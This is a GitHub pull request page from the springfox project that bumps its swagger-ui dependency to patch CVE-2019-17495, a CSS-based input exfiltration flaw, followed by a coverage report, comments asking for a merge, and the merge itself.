Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bump swagger-ui depdency #3135

Merged
merged 1 commit into from
Jan 6, 2020
Merged

Bump swagger-ui depdency #3135

merged 1 commit into from
Jan 6, 2020

Conversation

StevenLocke
Copy link
Contributor

Security fix detailed in swagger-ui's release notes.
https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11

What's this PR do/fix?

Bumps the swagger-ui dependency.

Are there unit tests? If not how should this be manually tested?

No new functionality, just a gradle dependency version change. All of the old tests should be run to verify no breaking changes between versions.

Any background context you want to provide?

Swagger-ui has a security fix that addresses a CSS-based input field value exfiltration vulnerability in this release.

What are the relevant issues?

#3131

@codecov
Copy link

codecov bot commented Oct 8, 2019
edited

Codecov Report

Merging #3135 into master will increase coverage by 0.02%.
The diff coverage is n/a.

Impacted file tree graph

@@             Coverage Diff              @@
##             master    #3135      +/-   ##
============================================
+ Coverage     92.91%   92.93%   +0.02%     
- Complexity     3512     3513       +1     
============================================
  Files           382      382              
  Lines          9330     9330              
  Branches        768      768              
============================================
+ Hits           8669     8671       +2     
+ Misses          472      471       -1     
+ Partials        189      188       -1
Impacted Files Coverage Δ Complexity Δ
...umentation/spring/web/scanners/ApiModelReader.java 95.46% <0%> (+0.56%) 88% <0%> (+1%) ⬆️

@margocrawf
Copy link

@martypitt @dilipkrish @adrianbk, please take a look at this PR that is related to https://nvd.nist.gov/vuln/detail/CVE-2019-17495, a 9.8 critical vulnerability.

@kalaivani572
Copy link

@martypitt @dilipkrish @adrianbk can you please take care of this PR? This issue is 9.8 critical vulnerability now and blocking us to use springfox.

@IAmJoffa
Copy link

I'm also waiting on the merge for this CVE fix, as it's blocking our use of the component.

@clarkead
Copy link

I'm also waiting on this to be merged as this library is getting flagged in my builds. @martypitt @dilipkrish @adrianbk any chance one of you could take a look at this PR?

@dilipkrish dilipkrish added the PR label Jan 6, 2020
@dilipkrish dilipkrish added this to the 3.0 milestone Jan 6, 2020
@dilipkrish
Copy link
Member

Thanks @StevenLocke

@dilipkrish dilipkrish merged commit dd3282c into springfox:master Jan 6, 2020
@dilipkrish dilipkrish mentioned this pull request Jul 14, 2020
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@dilipkrish dilipkrish dilipkrish approved these changes

Assignees
No one assigned
Labels
PR
Projects
None yet
Milestone
3.0
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@StevenLocke @margocrawf @kalaivani572 @IAmJoffa @clarkead @dilipkrish